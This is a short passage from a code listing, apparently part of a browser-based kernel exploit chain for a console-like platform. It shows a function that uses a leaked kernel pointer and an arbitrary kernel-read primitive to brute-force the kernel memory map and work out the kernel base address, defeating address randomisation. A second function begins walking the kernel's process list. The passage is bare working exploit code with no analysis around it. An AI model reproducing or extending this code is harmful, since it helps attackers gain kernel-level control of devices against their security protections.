()
| 669 | } |
| 670 | |
| 671 | function brute_force_kernel_map() { |
| 672 | var attempt = new int64(((leaked_pktopts_address.low & 0xFE000000) + VM_MAP_PMAP_OFFSET), leaked_pktopts_address.hi); |
| 673 | for (var i = 0; i < 0xC0; i++) { |
| 674 | var kernel_pmap_store = kernel_read8(attempt); |
| 675 | if (kernel_pmap_store.hi == 0xFFFFFFFF && ((kernel_pmap_store.low & 0x3FFF) == (KERNEL_PMAP_STORE_OFFSET & 0x3FFF))) { |
| 676 | kernel_base = kernel_pmap_store.sub32(KERNEL_PMAP_STORE_OFFSET); |
| 677 | if ((kernel_base.low & 0x3FFF) == 0x0) { |
| 678 | return; |
| 679 | } |
| 680 | } |
| 681 | attempt.sub32inplace(0x01000000); |
| 682 | } |
| 683 | alert("[ERROR] failed to find kernel_map REBOOT"); |
| 684 | while (1) {}; |
| 685 | } |
| 686 | |
| 687 | function find_proc() { |
| 688 | var proc = kernel_read8(kernel_base.add32(KERNEL_ALLPROC_OFFSET)); |
no test coverage detected